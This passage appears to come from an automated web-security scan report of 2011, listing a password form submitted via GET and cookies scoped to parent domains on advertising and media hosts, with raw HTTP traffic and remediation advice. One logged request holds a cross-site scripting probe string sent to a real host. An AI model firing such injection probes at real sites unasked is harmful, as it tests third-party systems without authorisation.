acb303093=5_[r^XI()vrO@Pn0nf8MwM9g$?enc=pyOAm8UL4j-wuVlyyz3gPwAAAAAAAAhAsLlZcss94D-nI4CbxQviP9CL-hxz-rYyBWHfHSmrEELBfzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA5UAIAPV0AAAEAAABVU0QAVVNEAKAAWAKqAQAAeggBAgUCAAUAAAAALyC12AAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482817%29%3Buf%28%27r%27%2C+151609%2C+1295482817%29%3Bppv%2882%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2884%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2811%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2882%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2884%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2887%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28619%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28620%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28621%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3B&cnd=!MR7WtAjUEBC5oAkYwI8BIL26ASgAMbKd76fGC-I_QhMIABAAGAAgASj-__________8BQg0IUhC54i4YoxkgAygGQg0IVBC5yTMYhwogAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7*@E:3F.0s]#%2L_'x%SEV/hnK7#=G#<huqu*`^-sAq$WUeUDuqkMr+c^Z(+ql_Y`mC^.fk]u+-ptW1B'#)hgVCgQw>7'NF7uNVkG0XN^BPJ.^ZXwcsDU[n.KmyD0IP?EJtun(LG%y$qg]mwnXkD%rDs0:0$Ob('INuCClbQ^7w=g32LzAgGCPGs/^Zf3+TaP
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Wed, 20-Apr-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb778475=5_[r^XI()vrO@Pn0nf8M!j@7*?enc=pyOAm8UL4j-wuVlyyz3gPwAAAAAAAAhAsLlZcss94D-nI4CbxQviPzkMt5lmDXglBWHfHSmrEELGfzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA5UAIAPV0AAAEAAABVU0QAVVNEAKAAWAKqAQAA_gYBAgUCAAUAAAAAlR4hLwAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482822%29%3Buf%28%27r%27%2C+151609%2C+1295482822%29%3Bppv%2882%2C+%272699922710925347897%27%2C+1295482822%2C+1305850822%2C+2132%2C+23869%29%3Bppv%2884%2C+%272699922710925347897%27%2C+1295482822%2C+1305850822%2C+2132%2C+23869%29%3Bppv%2811%2C+%272699922710925347897%27%2C+1295482822%2C+1305850822%2C+2132%2C+23869%29%3Bppv%2882%2C+%272699922710925347897%27%2C+1295482822%2C+1305850822%2C+2132%2C+23869%29%3Bppv%2884%2C+%272699922710925347897%27%2C+1295482822%2C+1305850822%2C+2132%2C+23869%29%3Bppv%2887%2C+%272699922710925347897%27%2C+1295482822%2C+1295569222%2C+2132%2C+23869%29%3Bppv%28619%2C+%272699922710925347897%27%2C+1295482822%2C+1295569222%2C+2132%2C+23869%29%3Bppv%28620%2C+%272699922710925347897%27%2C+1295482822%2C+1295569222%2C+2132%2C+23869%29%3Bppv%28621%2C+%272699922710925347897%27%2C+1295482822%2C+1295569222%2C+2132%2C+23869%29%3B&cnd=!MR7WtAjUEBC5oAkYwI8BIL26ASgAMbKd76fGC-I_QhMIABAAGAAgASj-__________8BQg0IUhC54i4YoxkgAygGQg0IVBC5yTMYhwogAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Fri, 21-Jan-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG49EE:3F.0s]#%2L_'x%SEV/hnLCF=G#<huqu*`^-sAq$WUeUDuqkMr+c^Z(+ql_Y`mC^.fk]u+-ptW1B'#)'qHqWd-AGmScENVx-p:Y9b66ZCJLN[8yvY$hcwDwhp^RbpUUZcwln=gw`]wKC0A)'9Dj6XfCjr1a#[D:I(3<csJ3xssMdQ3gcc=Zx1u*B$99h/3z-gm; path=/; expires=Wed, 20-Apr-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Thu, 20 Jan 2011 00:20:22 GMT Content-Length: 504
The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.
Issue remediation
All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.
GET /index.php HTTP/1.1 Host: americascup.mediaaccess.evolix.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:36:56 GMT Server: Apache Set-Cookie: PHPSESSID=f7dd62b0baadb91dcf47f180dfeb400d; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 60255
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Americas Cup Media</ ...[SNIP]... <td colspan='2' class='typo_login' align='center'> <form name='identification' action='' method='get' enctype="multipart/form-data"><div id='tab_identite' style='display:none; '> ...[SNIP]... <input name="login" id='login' type="text" class="form" > psw <input name="psw" id='psw' type="password" class="form" > <input type="button" class="form" value="ok" name="submit" id='validezlogin' rel='The "Email" field is not adequately filled'> ...[SNIP]...
The page contains a form with the following action URL, which is submitted using the GET method:
http://www.americascupmedia.com/index.php
The form contains the following password field:
psw
Request
GET /index.php HTTP/1.1 Host: www.americascupmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:44:48 GMT Server: Apache Set-Cookie: PHPSESSID=5df83766a88aa55095427a70359ae9f4; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 60255
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Americas Cup Media</ ...[SNIP]... <td colspan='2' class='typo_login' align='center'> <form name='identification' action='' method='get' enctype="multipart/form-data"><div id='tab_identite' style='display:none; '> ...[SNIP]... <input name="login" id='login' type="text" class="form" > psw <input name="psw" id='psw' type="password" class="form" > <input type="button" class="form" value="ok" name="submit" id='validezlogin' rel='The "Email" field is not adequately filled'> ...[SNIP]...
7. Cookie scoped to parent domainpreviousnext There are 29 instances of this issue:
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /submit HTTP/1.1 Host: www.stumbleupon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
_uid="a104_5562153497824379009";expires=Fri, 20 Jan 2012 00:26:19 GMT;domain=.fwmrm.net;path=/;
_vr="1295483178..60536~60671~66149~103579~170504~173095~306401~,";expires=Sat, 19 Feb 2011 00:26:19 GMT;domain=.fwmrm.net;path=/;
_sc="sg23001.1295483179.1295483179.28800.0.0,";expires=Sat, 19 Feb 2011 00:26:19 GMT;domain=.fwmrm.net;path=/;
_wr="g23001";expires=Sat, 19 Feb 2011 00:26:19 GMT;domain=.fwmrm.net;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ad/g/1?nw=10274&pvrn=Insert%20Random%20Number%20Here&csid=display&resp=ad;;ptgt=s&envp=g_js&slid=Rectangle&w=300&h=250 HTTP/1.1 Host: 2822.v.fwmrm.net Proxy-Connection: keep-alive Referer: http://blip.tv/file/4639878 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: _uid="a104_5562153497824379009"; _vr="1295039779..246255~312652~,"; _cph="1295039779.438.1.1,"; _sc="sg122034.1295039779.1295039779.28800.0.0,"; _wr="g122034"
The following cookies were issued by the application and is scoped to a parent of the issuing domain:
_uid="a104_5562153497824379009";expires=Fri, 20 Jan 2012 00:14:07 GMT;domain=.fwmrm.net;path=/;
_auv="g23001~1.1295482447.0,13310.1295482447.0,^";expires=Sat, 19 Feb 2011 00:14:07 GMT;domain=.fwmrm.net;path=/;
_vr="1295482435..60536~60671~66149~103579~170504~173095~306401~,";expires=Sat, 19 Feb 2011 00:14:07 GMT;domain=.fwmrm.net;path=/;
_sc="sg23001.1295482428.1295482447.28800.0.0,";expires=Sat, 19 Feb 2011 00:14:07 GMT;domain=.fwmrm.net;path=/;
_wr="g23001";expires=Sat, 19 Feb 2011 00:14:07 GMT;domain=.fwmrm.net;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ad/l/1?last=0&ct=0&metr=127&s=a116&t=12954824355285936&adid=170504&reid=79402&arid=0&auid=&cn=defaultImpression&et=i&_cc=170504,79402,11811.,11074.11081.11744.11811.,1295482435,1&tpos=0&iw=&uxnw=&uxss=&uxct=&init=1&cr= HTTP/1.1 Host: 2822.v.fwmrm.net Proxy-Connection: keep-alive Referer: http://a.blip.tv/scripts/flash/stratos.swf?file=http%3A//blip.tv/rss/flash/4658178%3Freferrer%3Dblip.tv%26source%3D1%26use_direct%3D1%26use_documents%3D1&enablejs=true&showplayerpath=http%3A//a.blip.tv/scripts/flash/stratos.swf&autostart=true&feedurl=http%3A//armchairmango.blip.tv/rss&playerUrl=http%3A//a.blip.tv/scripts/flash/stratos.swf&staggeredLoad=true&showinfo=false&enableHtml5Player=true Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: _cph="1295039779.438.1.1,"; _sid="a116_5564054660803241609"; NSC_ozdbewjq3.gxnsn.ofu=ffffffff09091f3545525d5f4f58455e445a4a423209; _uid="a104_5562153497824379009"; _vr="1295482435..60536~60671~66149~103579~170504~173095~306401~,"; _sc="sg23001.1295482428.1295482436.28800.0.0,"; _wr="g23001"
Response
HTTP/1.1 200 OK Set-Cookie: _uid="a104_5562153497824379009";expires=Fri, 20 Jan 2012 00:14:07 GMT;domain=.fwmrm.net;path=/; Set-Cookie: _auv="g23001~1.1295482447.0,13310.1295482447.0,^";expires=Sat, 19 Feb 2011 00:14:07 GMT;domain=.fwmrm.net;path=/; Set-Cookie: _vr="1295482435..60536~60671~66149~103579~170504~173095~306401~,";expires=Sat, 19 Feb 2011 00:14:07 GMT;domain=.fwmrm.net;path=/; Set-Cookie: _sc="sg23001.1295482428.1295482447.28800.0.0,";expires=Sat, 19 Feb 2011 00:14:07 GMT;domain=.fwmrm.net;path=/; Set-Cookie: _wr="g23001";expires=Sat, 19 Feb 2011 00:14:07 GMT;domain=.fwmrm.net;path=/; Content-Type: text/html Content-Length: 0 Pragma: no-cache Date: Thu, 20 Jan 2011 00:14:06 GMT Server: FWS P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"
The following cookies were issued by the application and is scoped to a parent of the issuing domain:
_uid="a104_5562153497824379009";expires=Fri, 20 Jan 2012 00:13:55 GMT;domain=.fwmrm.net;path=/;
_vr="1295482435..60536~60671~66149~103579~170504~173095~306401~,";expires=Sat, 19 Feb 2011 00:13:55 GMT;domain=.fwmrm.net;path=/;
_sc="sg23001.1295482428.1295482435.28800.0.0,";expires=Sat, 19 Feb 2011 00:13:55 GMT;domain=.fwmrm.net;path=/;
_wr="g23001";expires=Sat, 19 Feb 2011 00:13:55 GMT;domain=.fwmrm.net;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ad?asId=1000000238307&sd=2x728x90&ct=15&enc=1&nif=1&sf=0&sfd=0&ynw=0&anw=1&rand=89023115&rk1=28177253&rk2=1295482425.162&pt=0&asc=139x31&vad=950x996 HTTP/1.1 Host: ad.afy11.net Proxy-Connection: keep-alive Referer: http://www.sailinganarchy.com/index_page1.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: a=AZ7s9B85IkyRNDgbVDU-vg; c=AQEBAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==; s=1,2*4d2913f5*YxNSVIeEeL*XkHked9a5WVEwm102ii7WMtfCA==*
Response
HTTP/1.0 200 OK Connection: close Cache-Control: no-cache, must-revalidate Server: AdifyServer Content-Type: text/javascript Content-Length: 1087 Set-Cookie: f=AgEBAAAAAAAMqJEHA343TQ==; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net; Set-Cookie: c=AQECAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00BAAEAdaTl1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net; P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
id=c653243310000d9|1044889/556043/14994|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click;h=v8/3a95/3/0/*/s;234980170;1-0;0;57570438;2321-160/600;40268054/40285841/1;u=,cm-93054228_1295482822,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.sportsreg-cm.sports_l-cm.weath_l;~okv=;pc=DFP234824030;;~aopt=0/ff/ef/ff;~fdr=234824030;0-0;62;49633220;2321-160/600;40285688/40303475/1;u=,cm-93054228_1295482822,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.sportsreg-cm.sports_l-cm.weath_l;~okv=;net=cm;u=,cm-93054228_1295482822,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.sportsreg-cm.sports_l-cm.weath_l;;cmw=owl;sz=160x600;net=cm;ord1=405617;contx=sports;an=40;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sports_l;btg=cm.weath_l;~aopt=2/0/ef/0;~sscs=?http:/www.lexus.com/thehardway/?vidid=thw3&cid=THW11NBROBOT HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://www.lexus.com/thehardway/?vidid=thw3&cid=THW11NBROBOT Set-Cookie: id=c653243310000d9|1044889/556043/14994|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Thu, 20 Jan 2011 00:35:29 GMT Server: GFE/2.0 Content-Type: text/html Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
id=c653243310000d9|2201481/1047249/14994|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /clk;234517278;58326487;v;pc=[TPAS_ID] HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://www.sho.com/site/order/index.do?source=acq_m_jan?source=m_JAQ_1047249_58326487_0&utm_source=58326487&utm_medium=omddisplay&utm_content=0&utm_campaign=JAQ Set-Cookie: id=c653243310000d9|2201481/1047249/14994|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Thu, 20 Jan 2011 00:35:32 GMT Server: GFE/2.0 Content-Type: text/html Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: brxserv.btrll.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: DRN1=AGPX0VDzIfo; GHP=AAAHkk03fk8FoA; BR_MBBV=Ak0tGDgAo4f8AWJjWTw
Response
HTTP/1.0 404 Not Found Date: Thu, 20 Jan 2011 00:28:43 GMT Server: Apache/2.0.63 (Unix) P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:28:43 GMT; path=/; domain=.btrll.com Content-Length: 161 Content-Type: text/html; charset=UTF-8
<html> <head> <title>Not Found</title> </head> <body> <h1>404 - Not Found</h1> Found unexpected '.' character in position 1 of path: /favicon.ico</body> </html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /v1/epix/2903/3844555/1938/2286/?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001AD)%3C/script%3E HTTP/1.1 Host: brxserv.btrll.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: DRN1=AGPX0VDzIfo; GHP=AAAHkk03fk8FoA; BR_MBBV=Ak0tGDgAo4f8AWJjWTw
Response
HTTP/1.0 404 Not Found Date: Thu, 20 Jan 2011 00:30:52 GMT Server: Apache/2.0.63 (Unix) P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:30:52 GMT; path=/; domain=.btrll.com Content-Length: 243 Content-Type: text/html; charset=UTF-8
<html> <head> <title>Not Found</title> </head> <body> <h1>404 - Not Found</h1> Missing parameter in position 7 of path: /v1/epix/2903/3844555/1938/2286/?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ea ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.click/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2Nsay8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL25vbmUvO1ZpZGVvOzEyOTU0ODI0NDI]] HTTP/1.1 Host: brxserv.btrll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GHP=AAAHkk03fk8FoA; BR_MBBV=Ak0tGDgAo4f8AWJjWTw; DRN1=AGPX0VDzIfo;
Response
HTTP/1.1 302 Found Date: Thu, 20 Jan 2011 00:40:06 GMT Server: Apache/2.0.63 (Unix) P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:40:06 GMT; path=/; domain=.btrll.com Expires: Tues, 01 Jan 1980 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: http://2901.btrll.com/clk/2901/4258/PreRoll.911.109723/none/;Video;1295482442 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.end/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL2RvbmU7VmlkZW87MTI5NTQ4MjQ0Mg HTTP/1.1 Host: brxserv.btrll.com Proxy-Connection: keep-alive Referer: http://a.blip.tv/scripts/flash/stratos.swf?file=http%3A//blip.tv/rss/flash/4658178%3Freferrer%3Dblip.tv%26source%3D1%26use_direct%3D1%26use_documents%3D1&enablejs=true&showplayerpath=http%3A//a.blip.tv/scripts/flash/stratos.swf&autostart=true&feedurl=http%3A//armchairmango.blip.tv/rss&playerUrl=http%3A//a.blip.tv/scripts/flash/stratos.swf&staggeredLoad=true&showinfo=false&enableHtml5Player=true Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: DRN1=AGPX0VDzIfo; GHP=AAAHkk03fk8FoA; BR_MBBV=Ak0tGDgAo4f8AWJjWTw
Response
HTTP/1.1 302 Found Date: Thu, 20 Jan 2011 00:14:37 GMT Server: Apache/2.0.63 (Unix) P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:14:37 GMT; path=/; domain=.btrll.com Expires: Tues, 01 Jan 1980 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: http://2901.btrll.com/imp/2901/4258/PreRoll.911.109723/done;Video;1295482442 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.end/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL2RvbmU7VmlkZW87MTI5NTQ4MjQ0Mg]] HTTP/1.1 Host: brxserv.btrll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GHP=AAAHkk03fk8FoA; BR_MBBV=Ak0tGDgAo4f8AWJjWTw; DRN1=AGPX0VDzIfo;
Response
HTTP/1.1 302 Found Date: Thu, 20 Jan 2011 00:40:05 GMT Server: Apache/2.0.63 (Unix) P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:40:05 GMT; path=/; domain=.btrll.com Expires: Tues, 01 Jan 1980 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: http://2901.btrll.com/imp/2901/4258/PreRoll.911.109723/done;Video;1295482442 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
